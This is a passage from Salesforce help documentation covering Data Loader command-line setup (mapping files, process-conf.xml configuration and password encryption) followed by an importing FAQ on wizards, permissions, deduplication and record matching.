BILLING_ADDRESS, SIC_CODE)
VALUES (@billing_address@, @sic_code@)

</value>
</property>
<property name="sqlParams"/>

<map>
<entry key="billing_address" value="java.lang.String"/>
<entry key="sic_code" value="java.lang.String"/>

</map>
</property>

</bean>

See Also:
Configuring Database Access

Mapping Columns
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When running Data Loader in batch mode from the command line, you must create a properties file that maps values between
Salesforce and data access objects.

1. Create a new mapping file and give it an extension of .sdl.
2. Observe the following syntax:

• On each line, pair a data source with its destination.
• In an import file, put the data source on the left, an equals sign (=) as a separator, and the destination on the right. In

an export file, put the destination on the left, an equals sign (=) as a separator, and the data source on the right.
• Data sources can be either column names or constants. Surround constants with double quotation marks, as in

“sampleconstant”. Values without quotation marks are treated as column names.
• Destinations must be column names.
• You may map constants by surrounding them with double quotation marks, as in:

"Canada"=BillingCountry
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3. In your configuration file, use the parameter process.mappingFile to specify the name of your mapping file.

Note:  If your field name contains a space, you must escape the space by prepending it with a backslash (\). For
example:

Account\ Name=Name

Column Mapping Example for Data Insert

The Salesforce fields are on the right.

SLA__C=SLA__c
BILLINGCITY=BillingCity
SYSTEMMODSTAMP=
OWNERID=OwnerId
CUSTOMERPRIORITY__C=CustomerPriority__c
ANNUALREVENUE=AnnualRevenue
DESCRIPTION=Description
BILLINGSTREET=BillingStreet
SHIPPINGSTATE=ShippingState

Column Mapping Example for Data Export

The Salesforce fields are on the left.

Id=account_number
Name=name
Phone=phone

Column Mapping for Constant Values

Data Loader supports the ability to assign constants to fields when you insert, update, and export data. If you have a field that
should contain the same value for each record, you specify that constant in the .sdl mapping file instead of specifying the
field and value in the CSV file or the export query.

The constant must be enclosed in double quotation marks. For example, if you’re importing data, the syntax is
"constantvalue"=field1.

If you have multiple fields that should contain the same value, you must specify the constant and the field names separated by
commas. For example, if you’re importing data, the syntax would be "constantvalue"=field1, field2.

Here’s an example of an .sdl file for inserting data. The Salesforce fields are on the right. The first two lines map a data
source to a destination field, and the last three lines map a constant to a destination field.

Name=Name
NumEmployees=NumberOfEmployees
"Aerospace"=Industry
"California"=BillingState, ShippingState
"New"=Customer_Type__c

A constant must contain at least one alphanumeric character.

Note:  If you specify a constant value that contains spaces, you must escape the spaces by prepending each with a
backslash (\). For example:

"Food\ &\ Beverage"=Industry
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Running Individual Batch Processes
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

To start an individual batch process use \bin\process.bat, which requires the following parameters:

A configuration directory

The default is \conf.

To use an alternate directory, create a new directory and add the following files to it:

• If your process is not interactive, copy process-conf.xml from \samples\conf.

• If your process requires database connectivity, copy database-conf.xml from \samples\conf.

• Copy config.properties from \conf.

A process name

The name of the ProcessRunner bean from \samples\conf\process-conf.xml.

Process Example

process ../conf accountMasterProcess

Note:  You can configure external process launchers such as the Microsoft Windows XP Scheduled Task Wizard to
run processes on a schedule.

COMMAND LINE QUICK START

Introduction
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Watch a Demo: Importing Accounts Using the Data Loader Command Line Interface (5:20 minutes)

In addition to using Data Loader interactively to import and export data, you can also run it from the command line. This
enables you to automate the import and export of data.

This quick start shows you how to use the Data Loader command line functionality to import data. You'll follow these steps:

• Step 1: Create the encryption key

• Step 2: Create the encrypted password for your login username
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• Step 3: Create the Field Mapping File

• Step 4: Create a process-conf.xml file that contains the import configuration settings

• Step 5: Run the process and import the data

Prerequisites
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

To step through this quick start, you should have the following:

• Data Loader installed on the computer that runs the command line process.

• The Java Runtime Environment (JRE) installed on the computer that runs the command line process.

• Familiarity with importing and exporting data by using the Data Loader interactively through the user interface. This
makes it easier to understand how the command line functionality works.

Tip:  When you install Data Loader, sample files are installed in the samples directory. This directory is found below
the program directory, for example, C:\Program Files (x86)\salesforce.com\Apex Data Loader
22.0\samples\. Examples of files that are used in this quick start can be found in the \samples\conf directory.

Step One: Create the Encryption Key
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When you use Data Loader from the command line, there’s no user interface. Therefore, you’ll need to provide the information
that you would normally enter in the user interface by using a text file named process-conf.xml. For example, you’ll need
to add to this file the username and password that Data Loader uses to log in to Salesforce. The password must be encrypted
before you add it to the process-conf.xml file, and creating the key is the first step in that process.

1. Open a command prompt window by clicking Start > All Programs > Accessories > Command Prompt. Alternatively,
you can click Start > Run, enter cmd in the Open field, and click OK.

2. In the command window enter cd\ to navigate to the root directory of the drive where Data Loader is installed.
3. Navigate to the Data Loader \bin directory by entering this command. Be sure to replace the file path with the path from

your system.

cd C:\Program Files (x86)\salesforce.com\Apex Data Loader 22.0\bin

4. Create an encryption key by entering the following command. Replace <seedtext> with any string.

encrypt.bat —g <seedtext>
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Note:  To see a list of command-line options for encrypt.bat, type encrypt.bat from the command line.

5. Copy the generated key from the command window to a text file named key.txt and make a note of the file path. In
this example, the generated key is e8a68b73992a7a54.

Note:  Enabling quick edit mode on a command window can make it easier to copy data to and from the window.
To enable quick edit mode, right-click the top of the window and select Properties. On the Options tab, select
QuickEdit Mode.

The encryption utility is used to encrypt passwords, but data that you transmit using Data Loader is not encrypted.

See Also:
Step Two: Create the Encrypted Password

Step Two: Create the Encrypted Password
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

In this step, you’ll create the encrypted password using the key that you generated in the previous step.

1. In the same command prompt window, enter the following command. Replace <password>with the password that Data
Loader uses to log in to Salesforce. Replace <filepath> with the file path to the key.txt file that you created in the previous
step.

encrypt.bat –e <password> "<filepath>\key.txt"
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2. Copy the encrypted password that is generated by the command. You'll use this value in a later step.

See Also:
Step Three: Create the Field Mapping File

Step Three: Create the Field Mapping File
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The field mapping file associates data sources with destinations. This is a text file, typically with an .sdl file extension.

1. Copy the following to a text file and save it with a name of accountInsertMap.sdl. This is a data insert so the data
source is on the left of the equals sign and the destination field is on the right.

#Mapping values
#Thu May 26 16:19:33 GMT 2011
Name=Name
NumberOfEmployees=NumberOfEmployees
Industry=Industry

Tip:  For complex mappings, you can use the Data Loader user interface to map source and destination fields and
then save those mappings to an .sdl file. This is done on the Mapping dialog box by clicking Save Mapping.

See Also:
Step Four: Create the Configuration File

Step Four: Create the Configuration File
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The process-conf.xml file contains the information that Data Loader needs to process the data. Each <bean> in the
process-conf.xml file refers to a single process such as an insert, upsert, export, and so on. Therefore, this file can contain
multiple processes. In this step, you'll edit the file to insert accounts into Salesforce.

1. Make a copy of the process-conf.xml file from the \samples\conf directory. Be sure to maintain a copy of the
original because it contains examples of other types of Data Loader processing such as upserts and exports.

2. Open the file in a text editor and replace the contents with the following XML:

<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN"
"http://www.springframework.org/dtd/spring-beans.dtd">
<beans>

<bean id="accountInsert"
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class="com.salesforce.dataloader.process.ProcessRunner"
singleton="false">
<description>accountInsert job gets the account record from the CSV file

and inserts it into Salesforce.</description>
<property name="name" value="accountInsert"/>
<property name="configOverrideMap">

<map>
<entry key="sfdc.debugMessages" value="true"/>
<entry key="sfdc.debugMessagesFile"

value="C:\DLTest\Log\accountInsertSoapTrace.log"/>
<entry key="sfdc.endpoint" value="https://servername.salesforce.com"/>
<entry key="sfdc.username" value="admin@Org.org"/>
<!--Password below has been encrypted using key file,

therefore, it will not work without the key setting:
process.encryptionKeyFile.
The password is not a valid encrypted value,
please generate the real value using the encrypt.bat utility -->

<entry key="sfdc.password" value="e8a68b73992a7a54"/>
<entry key="process.encryptionKeyFile"

value="C:\DLTest\Command Line\Config\key.txt"/>
<entry key="sfdc.timeoutSecs" value="600"/>
<entry key="sfdc.loadBatchSize" value="200"/>
<entry key="sfdc.entity" value="Account"/>
<entry key="process.operation" value="insert"/>
<entry key="process.mappingFile"

value="C:\DLTest\Command Line\Config\accountInsertMap.sdl"/>
<entry key="dataAccess.name"

value="C:\DLTest\In\insertAccounts.csv"/>
<entry key="process.outputSuccess"

value="c:\DLTest\Log\accountInsert_success.csv"/>
<entry key="process.outputError"

value="c:\DLTest\Log\accountInsert_error.csv"/>
<entry key="dataAccess.type" value="csvRead"/>
<entry key="process.initialLastRunDate"

value="2005-12-01T00:00:00.000-0800"/>
</map>

</property>
</bean>

</beans>

3. Modify the following parameters in the process-conf.xml file. For more information about the process configuration
parameters, see Data Loader Process Configuration Parameters on page 506.

• sfdc.endpoint—Enter the URL of the Salesforce instance for your organization; for example,
https://na1.salesforce.com.

• sfdc.username—Enter the username Data Loader uses to log in.
• sfdc.password—Enter the encrypted password value that you created in step 2.
• process.mappingFile—Enter the path and file name of the mapping file.
• dataAccess.Name—Enter the path and file name of the data file that contains the accounts that you want to import.
• sfdc.debugMessages—Currently set to true for troubleshooting. Set this to false after your import is up and

running.
• sfdc.debugMessagesFile—Enter the path and file name of the command line log file.
• process.outputSuccess—Enter the path and file name of the success log file.
• process.outputError—Enter the path and file name of the error log file.
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Warning:  Use caution when using different XML editors to edit the process-conf.xml file. Some editors
add XML tags to the beginning and end of the file which will cause the import to fail.

See Also:
Step Five: Import the Data

Step Five: Import the Data
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Create” on the recordTo insert records:

“Edit” on the recordTo update records:

“Create” or “Edit” on the recordTo upsert records:

“Delete” on the recordTo delete records:

“Delete” on the recordTo hard delete records:

Now that all the pieces are in place, you can run Data Loader from the command line and insert some new accounts.

1. Copy the following data to a file name accountInsert.csv. This is the account data that you'll import into your
organization.

Name,Industry,NumberOfEmployees
Dickenson plc,Consulting,120
GenePoint,Biotechnology,265
Express Logistics and Transport,Transportation,12300
Grand Hotels & Resorts Ltd,Hospitality,5600

2. In the command prompt window, enter the following command:

process.bat "<file path to process-conf.xml>" <process name>

• Replace <file path to process-conf.xml> with the path to the directory containing process-conf.xml.
• Replace <process name> with the process specified in process-conf.xml.

Your command should look something like this:

process.bat "C:\DLTest\Command Line\Config" accountInsert

After the process runs, the command prompt window displays success and error messages. You can also check the log files:
insertAccounts_success.csv and insertAccounts_error.csv. After the process runs successfully, the
insertAccounts_success.csv file will contain the records that you imported along with the ID and status of each
record. For more information about the status files, see Reviewing Output Files on page 501.
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Data Loader Third-Party Licenses
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The following third-party licenses are included with the installation of Data Loader:

LicenseVersion NumberTechnology

http://www.apache.org/licenses/LICENSE-2.01.6Apache Jakarta Commons
BeanUtils

http://www.apache.org/licenses/LICENSE-2.03.1Apache Commons Collections

http://www.apache.org/licenses/LICENSE-2.01.2.1Apache Commons Database
Connection Pooling (DBCP)

http://www.apache.org/licenses/LICENSE-1.11.0.3Apache Commons Logging

http://www.apache.org/licenses/LICENSE-2.01.2Apache Commons Object Pooling
Library

http://www.apache.org/licenses/LICENSE-2.01.2.8Apache Log4j

http://www.eclipse.org/legal/epl-v10.html3.452Eclipse SWT

http://www.opensymphony.com/quartz/license.action1.5.1OpenSymphony Quartz Enterprise
Job Scheduler

http://www.mozilla.org/MPL/MPL-1.1.txt1.6R2Rhino JavaScript for Java

http://www.apache.org/licenses/LICENSE-2.0.txt1.2.6Spring Framework

Note: Salesforce.com is not responsible for the availability or content of third-party websites.

IMPORTING FAQ

General Importing Questions
Available in: All Editions.

• Can I mass upload data into Salesforce?

• Should I use the import wizards or Connect for Outlook to upload my data into Salesforce?
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• Who in my organization can use the import wizards?

• What permissions do I need to import records?

• What file formats can the import wizards handle?

• What data can be imported?

• Are there size restrictions on my import data?

• Why can’t I log in to Data Loader?

• Why isn’t Data Loader importing special characters?

• Can I import into custom fields?

• Can I import into fields that are not on my page layout?

• What's the difference between importing data into a custom field or into a picklist?

• Can I delete my imported data if I make a mistake?

• How do I update records using the Import Wizard?

• Why do date fields import incorrectly when I use the Data Loader?

• What does the Import Queue show me?

• How long does it take to import a file?

• Why might there be a delay in importing my file?

• Can I import amounts in different currencies?

• Can Customer Support help me import my data?

• Can I import data in more than one language?

• How do I perform mass updates to records?

• How do I update fields with blank values?

• What is an external ID?

See Also:
Importing Business Accounts and Contacts
Importing Person Accounts
Importing Leads
Importing Campaign Members
Importing Solutions
Importing Custom Objects

Can I mass upload data into Salesforce?
Professional, Unlimited, Enterprise, and Developer editions have a mass import wizard for accounts, contacts, leads, and
custom objects that will allow you to mass import data. In addition, Unlimited, Enterprise, and Developer editions have API
access to use database mass upload tools like Data Loader.
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Should I use the import wizards or Connect for Outlook to upload my
data into Salesforce?

In organizations that do not use person accounts:
If you want to upload accounts and contacts for multiple users at one time, your administrator should use the Import
My Organization’s Accounts and Contacts wizard. If you want to upload your own contacts from any application other
than Outlook, you should use the Import My Contacts wizard.

If you use Microsoft Outlook and want to keep your Outlook contacts, accounts, and calendar events up to date with
Salesforce, we recommend you use Salesforce for Outlook to initially sync your data and for all subsequent updates. You
can also sync your Outlook data, including tasks, using Connect for Outlook.

For custom objects, leads, and solutions, your administrator must use the respective import wizard to import those kinds
of records into Salesforce. You can't sync those records using Salesforce for Outlook or Connect for Outlook.

In organizations that use person accounts:
Person accounts are not supported in Salesforce for Outlook or Connect for Outlook.

If you want to upload person accounts for multiple users at one time, your administrator should use the Import My
Organization’s Person Accounts wizard. If you want to upload business accounts and contacts for multiple users at one
time, your administrator should use the Import My Organization’s Business Account/Contacts wizard. If you want to
upload your own person accounts, you should use the Import My Person Accounts wizard. If you want to upload your
own contacts from any application other than Outlook, you should use the Import My Contacts wizard.

For custom objects, leads, and solutions, your administrator must use the respective import wizard to import those kinds
of records into Salesforce.

Who in my organization can use the import wizards?
All users in your organization can use the Import My Contacts wizard. In Enterprise, Unlimited, or Developer Edition
organizations with person accounts enabled, all users can use the Import My Person Accounts wizard.

Only an administrator can use the organization-wide “Import My Organization's” wizards to import accounts, contacts, leads,
solutions, or custom objects for multiple users at one time. In Personal Edition, none of the organization-wide wizards are
available. In Contact Manager and Group Edition, the “Import My Organization's Leads” and “Import My Organization's
Solutions” wizards are not available.

What permissions do I need to import records?

Data Loader
To import records with the Data Loader, you need “Create” permission on the record you want to import.

Import Wizard for Records You Own

Access neededRecords being imported

Any userMy Contacts
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Access neededRecords being imported

“Create” on accounts

AND

My Person Accounts

“Read” on contacts

AND

“Import Personal Contacts”

AND

At least one person account record type available from your
profile or permission sets

Import Wizard for Records Owned By Other Users

Access neededRecords being imported

Administrators

Users with the “Modify All Data” permission

My Organization’s Accounts and Contacts

Any user with “Import Person Accounts” permissionMy Organization’s Person Accounts

“Read”, “Create”, and “Edit” on leads

AND

My Organization’s Leads

“Import Leads”

Any user with “Import Solutions” permissionMy Organization’s Solutions

Any user with “Modify All Data” permissionMy Organization’s Custom Objects

Import Wizard for Campaign Members

Access neededRecords being imported

“Edit” on campaigns

AND

New Campaign Members (Lead Import Wizard)

Marketing User checked in your user information

AND

“Import Leads”

“Edit” on campaigns

AND

Updated Campaign Members (Campaign Update Wizard)

“Import Leads”

AND

“Read” on contacts

Marketing User checked in your user information
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What file formats can the import wizards handle?
You can import contacts and business accounts directly from an ACT! or Outlook file, or from any CSV (comma-separated
values) file, such as a GoldMine or Excel file. You can import leads, solutions, custom objects, or person accounts from any
CSV file.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

What data can be imported?
You can use import wizards to import the following records:

Contacts and business accounts
Use the Import My Contacts wizard and the Import My Organization’s Accounts and Contacts wizard to import contacts
and business accounts. In organizations with person accounts, note that the Import My Organization’s Accounts and
Contacts wizard is called the Import My Organization’s Business accounts/Contacts wizard.

In Professional, Enterprise, Unlimited, and Developer Edition organizations, you can also import contact and business
account notes.

Person accounts
In Enterprise, Unlimited, and Developer Edition organizations, use the Import My Person Accounts wizard to import
person accounts that you own. Administrators can use the Import My Organization's Person Accounts wizard to import
person accounts for multiple users.

Leads
In Professional, Enterprise, Unlimited, and Developer Edition organizations, use the Import My Organization’s Leads
wizard to import leads.

Solutions
In Professional, Enterprise, Unlimited, and Developer Edition organizations, use the Import My Organization's Solutions
wizard to import solutions.

Custom objects
In Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Edition organizations, use the Import
My Organization's Custom Objects wizard to import custom objects.

In the “Import My Organization's...” wizards for accounts, contacts, leads, solutions, and custom objects, administrators can
import into any of the listed fields, even if a field is hidden or read-only in their page layout or field-level security settings.
Individual users can import only into the fields that are accessible to them via their page layout or field-level security settings.

Import wizards for other records are not available.
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Are there size restrictions on my import data?
Yes. Your import file cannot exceed 100MB in size, and each record in the file cannot be bigger than 400KB. In addition,
each imported note and each imported description cannot exceed 32KB. Descriptions longer than 32KB are truncated.

In addition to the import file limits, your import is also subject to the overall storage limits for your organization. Note that
the size of your import file does not directly correlate to the storage space needed for those records. For example, an import
file of 50MB in size may not create 50MB of data in Salesforce.

Why can’t I log in to Data Loader?
If you’re having trouble logging in to Data Loader, try the following solutions.

• Add a security key to the end of your password to log in to Data Loader.

• Change the Server host to point to the appropriate server in Data Loader by following these steps:

1. Start the Data Loader by navigating to Start > Programs > salesforce.com > Data Loader > Data Loader.
2. Navigate to Settings > Settings.
3. Set Server host to https://instance_name.salesforce.com, where instance_name is the Salesforce

instance you’re on.
4. Click OK to save your settings.

• Ask your administrator whether you’re working behind a proxy server. If so, adjust your Data Loader settings. If you’re
using APIs that are behind a proxy server, the proxy server prevents the APIs from connecting with Salesforce servers; you
won’t see information about the APIs under Login History.

Why isn’t Data Loader importing special characters?
If Data Loader fails to import special characters such as ö, ñ, or é, your source data file might not be properly encoded. To
ensure the file is properly encoded:

1. Make any modifications to your source data file in .xls format.
2. In Microsoft® Excel®, save a copy of your file as a Unicode Text file.
3. Open the Unicode Text file you just saved with a text editor.
4. Click File > Save As to change the following file settings:

• File name extension—.csv

• Save as type—All Files
• Encoding—UTF-8

5. Click Save, and close the file.

Note:  Don’t open the file after you have saved the settings or you may revert the encoding changes.

532

General Importing QuestionsImport Your Data



6. Import the data using Data Loader as you normally would, and select the newly created .csv file.

Can I import into custom fields?
Yes. Your administrator must create the custom fields prior to import.

For checkbox fields, records with a value of 1 in the field are imported as checked while a value of 0 is not checked.

Can I import into fields that are not on my page layout?
No. You can import only into the fields that are accessible to you via your page layout or field-level security settings. However,
in the organization-wide import wizards for accounts, contacts, leads, solutions, and custom objects, administrators have access
to import into any of the listed fields, even if a field is hidden or read-only in their page layout or field-level security settings.

What's the difference between importing data into a custom field or into
a picklist?

When you have data that does not match any of the standard fields, your administrator can create a custom field for that data
prior to import. For example, you might want a Middle Name field for contacts. During import, you map your data to that
custom field.

A picklist is a field with a predefined set of values from which you pick. For example, the Rating picklist has predefined
values of “Hot,” “Warm,” and “Cold.” You should import your data into an existing picklist when that picklist accurately
represents your data, even if the exact values do not match. The import wizards warn you before importing any new picklist
values. However, the wizards will accept any value for a picklist field, even if the value is not predefined. Your administrator
can later edit the picklist to include the needed values. Note that the import wizards do not allow you to import more than
100 new picklist or multi-select picklist values for any field during a single import.

Can I delete my imported data if I make a mistake?
Your administrator can from Setup, click Data Management > Mass Delete Records to perform a mass delete of accounts,
contacts, leads, or solutions that you mistakenly imported. You cannot mass delete mistakenly imported custom objects.

View the Using Mass Delete to Undo Imports document for instructions.

For organization imports that have not begun processing, you can cancel an import in the Import Queue. From Setup, click
Monitoring > Imports. Alternatively, from Setup, click Data Management, choose one of the import wizards, and then
select the import queue link. The import queue is not accessible to Personal Edition organizations.
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How do I update records using the Import Wizard?
You can use the Import Wizard to update leads, contacts, or accounts using the record’s ID as the unique identifier. These
steps do not apply to custom objects.

Note:  These steps assume you have administrator-level of knowledge with Salesforce.

Before you begin, prepare the data you’re updating.

1. Create a tabular report for the records you’re updating, including the record ID and the fields you’re updating.
2. Save the report locally as a .csv file for backup purposes.
3. Click Save As to create a new version of the .csv file and make your changes to the data.
4. Click Save.

After you have updated the report, import the .csv file into Salesforce. The steps vary based on the records you’re updating.

To Update Leads

1. From Setup, click Data Management > Import Leads > Start the Import Wizard!.
2. Under Matching Type, choose Salesforce.com ID. Click Next.
3. Select Overwrite existing lead values.
4. Map the Lead ID field to the Lead ID column in your local file, as well as all other fields.
5. Review, and click Import Now!.

To Update Accounts or Contacts

1. From Setup, click Data Management > Import Accounts/Contacts > Start the Import Wizard!.
2. Click Next, and then click Choose File to select the file you’re importing.
3. Under Contact Matching Type, choose Salesforce.com ID. The Account Matching Type automatically matches the

Contact Matching Type. Click Next.
4. Map the Contact Id field to the Contact ID column in your local file, and map the other contact fields. Click Next.
5. Map the contact phone and address fields. Click Next.
6. Select Overwrite existing account values, map the Account Id field to the Account ID column in your local file, and

map the other account fields. Click Next.
7. Map the extra import fields, and click Next.
8. Click Import Now!.

The import wizard matches the record IDs in your file with the record IDs in Salesforce and updates the fields that were
mapped.

Why do date fields import incorrectly when I use the Data Loader?
When importing date fields using the Data Loader, sometimes dates import incorrectly because the Data Loader converts the
date specified in the imported .csv file to GMT. If your machine’s time zone isn’t GMT or if your machine’s clock adjusts for
daylight savings time (DST), your dates may be off by a day.
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To prevent the Data Loader from adjusting the date when it converts to GMT, directly change the format of cells containing
dates to reflect the native time zone.

1. Open your .csv file in Microsoft® Excel®.
2. In each cell in which you entered dates, add hour data to represent the native time zone. For example, if the date is June

9, 2011 and the time zone is GMT+8, enter June 9, 2011 8:00. Excel will reformat this to 6/9/2011 8:00.
3. Right-click the cell in which you entered dates, and click Format Cells.
4. Click Number > Custom.
5. In Type, enter yyyy-mm-ddThh:mm:ss.sssZ. For example, if the cell was 6/9/2011 8:00, it’s now

2011–06–09T08:00:00.00Z.

What does the Import Queue show me?
From Setup, click Monitoring > Imports. The Import Queue shows all of the unprocessed files you have submitted using
the import wizards under Setup, in Data Management. You can see when each file was submitted, its status, and a processing
time estimate. Click Del to cancel an import file that has not begun processing. The import queue is not accessible to Personal
Edition organizations.

How long does it take to import a file?
For the individual user import wizard, the length of time required depends on the amount of data, but on average it only takes
a few minutes.

The administrator import wizards work asynchronously, and you will receive a notification email after your file has been
successfully imported. The asynchronous import can take a few minutes to no more than 24 hours.

Administrators, except in Personal Edition, can also check the Import Queue to view the progress of import files. From Setup,
click Monitoring > Imports. To expedite the import process, we recommend you review the directions in Importing Overview
on page 434.

Why might there be a delay in importing my file?
In order to manage the volume of imports and ensure that all users receive the highest level of performance, organization
import files are accepted in “asynchronous” mode. This means that your file passes through a controlled queue and will be
imported when the system can best manage the data, however your organization import will not take longer than 24 hours to
complete. You will receive a notification email when the import is complete.

Can I import amounts in different currencies?
If your Group, Professional, Enterprise, Unlimited, or Developer Edition organization has set up the ability to use multiple
currencies, you can import amounts in different currencies using the Currency ISO Code column in your import file.
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Can Customer Support help me import my data?
Customer Support is available to assist Group, Professional, Enterprise, and Unlimited Edition organizations throughout the
import process.

Can I import data in more than one language?
The import wizard imports one language at a time, the language of the user doing the import. If you have the same data in
different languages, run an import for each additional language.

How do I perform mass updates to records?
To update more than 50,000 but less than 5 million records, use Data Loader.

To update more than 5 million records, we recommend you work with a salesforce.com partner or visit the App Exchange for
a suitable partner product.

How do I update fields with blank values?
To replace fields with null values, you must use Data Loader.

1. Choose Start > All Programs > salesforce.com > Data Loader > Data Loader to open Data Loader.
2. Click Export and complete the wizard. When the operation finishes, click View Extraction.
3. Click Open in external program to open your data in Excel. Blank out the fields you want to update.
4. In Data Loader, choose Settings  > Settings, and select Insert null values. Click OK to save your settings.
5. Click Update and follow the wizard to reimport your data.

What is an external ID?
When importing custom objects, solutions, or person accounts, you can use external IDs to prevent duplicate records from
being created as a result of the import operation.

An external ID is a custom field that has the “External ID” attribute, meaning that it contains unique record identifiers from
a system outside of Salesforce. When you select this option, the import wizard will detect existing records in Salesforce that
have the same external ID. Note that this operation is not case-sensitive - for example, “ABC” will be matched with “abc”.
However, there is an exception: if the custom field has the separate “Unique” attribute and the case-sensitive option for that
attribute is selected, uppercase and lowercase letters will not be considered identical.
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Importing Business Accounts and Contacts
Available in: All Editions

• How many contact and business account records can I import?

• How do I prepare my contact data?

• What do I do with extra data that does not match any contact or business account fields?

• Can the import wizards de-duplicate my contact and business account data?

• When do the import wizards create new contacts and business accounts?

• Can the import wizards change the ownership of existing contacts and business accounts?

• Can I import contact and business account records that are owned by different people?

• Can the contact and business account import wizards recognize similar names?

• Can I import existing contact and business account data to add information?

• How do the import wizards associate contacts and business accounts?

• What type of data integrity warnings can I possibly expect?

• Can I synchronize my contact and business account data after I’ve imported it?

How many contact and business account records can I import?
For organizations without person accounts, individual users can import up to 500 records during each import session, and
administrators can import up to 50,000 records at a time running the Import My Organization’s Accounts and Contacts
wizard.

For organizations with person accounts, users can run the Import My Organization’s Accounts and Contacts wizard.

If you have more than the allowable number of records, simply repeat the import process. In addition to the record limits on
each import, your import is also subject to the overall storage limits for your organization.

How do I prepare my contact data?
1. Export your contacts and business accounts from their source.
2. For individual imports from ACT! or Outlook, review the default field mappings and modify your data if necessary. For

individual imports from other sources or organization imports, use Excel to clean up your data and label your import
columns with the field names listed under Field Mapping for Other Data Sources and Organization Import.

3. Save the file in a CSV format and start the appropriate import wizard.
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What do I do with extra data that does not match any contact or business
account fields?

In the import wizards, Professional, Enterprise, Unlimited, and Developer Edition users can choose to import miscellaneous
data into business account or contact Note fields, or not import it at all. When importing into notes, the wizard creates a
single business account or contact Note field for the data.

Alternatively, your administrator can create custom fields for the miscellaneous data prior to the import. In Personal, Contact
Manager, and Group Edition organizations, miscellaneous data is not imported unless your administrator creates custom
fields.

Can the import wizards de-duplicate my contact and business account
data?

The Import My Contacts wizard and the Import My Organization’s Accounts and Contacts wizard attempt to eliminate
duplicate contacts and business accounts. In organizations with person accounts, note that the Import My Organization’s
Accounts and Contacts wizard is called the Import My Organization’s Business accounts/Contacts wizard. The import wizards
can merge data in your import file with existing records in Salesforce only if you are the owner of or have read/write access to
the existing records. You can specify criteria for avoiding duplicates by choosing a Matching Type. Your personal contacts
can be matched by name or email. Your organization’s contacts can be matched by Salesforce ID, name, or email. Your
organization’s business accounts can be matched by Salesforce ID or by name and site.

Avoiding Duplicate Business Accounts

The import wizards attempt to avoid duplicate business accounts based on:

• If Salesforce ID is the Account Matching Type:

Business accounts are matched according to their account ID. That is, if there is a record in your import file that has the
same ID as a record in Salesforce, then that record will be updated in Salesforce.

• If Name and Site is the Account Matching Type:

◊ If two accounts have the same Account Name and Account Site, the wizards add your import data to the existing
data in Salesforce.

◊ If more than one record in your import file has the same Account Name and Account Site, the wizards merge
those records and create only one account in Salesforce.

◊ If two accounts have “similar” Account Name and Account Site values, the wizards add your import data to the
existing data in Salesforce

◊ If the Account Site field is empty in your import file, the wizards match just on the Account Name field, ignoring
any site values that may exist in Salesforce.

◊ Local name fields are imported but not checked for duplicates.

• The wizards do not overwrite any existing business account fields unless you check the Overwrite existing account
values box in the wizard.

With this box checked, you can insert or update existing business account fields with new data. However, you cannot use
this checkbox to update existing field data with blank values. With this box unchecked, the wizard updates any empty
business account fields, but does not touch any fields with existing data.

Avoiding Duplicate Contacts
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The import wizards attempt to avoid duplicate contacts based on:

• If Salesforce ID is the Contact Matching Type:

Contacts are matched according to their contact ID. That is, if there is a record in your import file that has the same ID
as a record in Salesforce, then that record will be updated in Salesforce.

• If Name is the Contact Matching Type:

◊ For contacts with the same Account Name, Account Site, First Name, and Last Name (or the same Account
Name, Account Site, and Full Name), the wizards merge your import data with existing data in Salesforce. The
contact name by itself is not sufficient information for matching; you must also include the contact’s business account.

◊ If two contacts have “similar” names in the Account Name, Account Site, and First Name and Last Name (or
Full Name) fields, the wizards merge the contacts into one record in Salesforce. However, if two contacts have the
same First Name (Local) or Last Name (Local), the wizard will not merge those records.

• If Email is the Contact Matching Type:

Contacts are matched according to their email within the scope of a given business account. That is, within a specified
business account, if a contact in your import file has the same email as a contact in Salesforce, then that contact will be
updated in Salesforce. If you are not matching by email and there is an existing contact in Salesforce with the same email,
then a new contact will be created for that business account.

• In the absence of any record matching between your import file and Salesforce, the wizards merge duplicate records in
your import file to create only one new contact in Salesforce.

For business account and contact notes in Professional, Enterprise, Unlimited, and Developer Edition organizations, the
wizards de-duplicate the notes in your import file if an existing business account or contact note has the exact same text.

Avoiding Duplicate Leads

The Import My Organization’s Leads wizard can eliminate duplicate leads if you choose a Matching Type of Salesforce
ID, Name, or Email.

When do the import wizards create new contacts and business accounts?
• If any of the contacts or business accounts in your import file do not match an existing record, the wizard creates a new

contact or business account.
• If you do not have object-level permission to update an object or read/write sharing access to an existing business account

or contact record that matches your import data, the wizard creates a new record owned by you.
• If you are matching records by name, the wizards create new records based on specific fields in your import file:

Record Created in SalesforceField in Your Import File

The wizards attempt to match this field to an existing
business account with the same Account Name. If the

Account Site

Account Name matches but the Account Site does not,
a new business account is created.

If the Account Name matches but the Account Site is
empty in the import file, the wizard updates the existing
business account but does not overwrite the existing site
value unless you check the Overwrite existing
account values box in the wizard.
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Record Created in SalesforceField in Your Import File

When this field is mapped to the contact Reports To field,
the wizards attempt to match the manager’s name to an

Outlook Manager's Name

existing contact within the same business account. If no
contact exists for the manager within the same business
account, a new one is created. For contacts that are not
attached to business accounts, the wizards try to match the
Manager's Name field to a contact from any business
account.

The wizards attempt to match the name to an existing
contact within the same business account. If no contact exists

Reports To

with that name in the same business account, a new one is
created. For contacts that are not attached to business
accounts, the wizards try to match the Reports To field
to any matching contact from any business account.

The wizards attempt to match the name in this field to an
existing business account. If no business account exists with
that name, a new one is created.

Parent Account

Can the import wizards change the ownership of existing contacts and
business accounts?

No. For individual imports, the wizard creates new records with you as the owner. For existing records that have matching
names, the wizard only updates records that you own or records to which you have read/write access. The ownership of these
records is not changed.

For organization imports, the wizard tries to merge existing data that matches, but it never changes the record ownership,
regardless of the Record Owner values in your import file. New and updated records are marked as having been created or
modified by the administrator doing the import. This does not affect the record ownership.

Can I import contact and business account records that are owned by
different people?

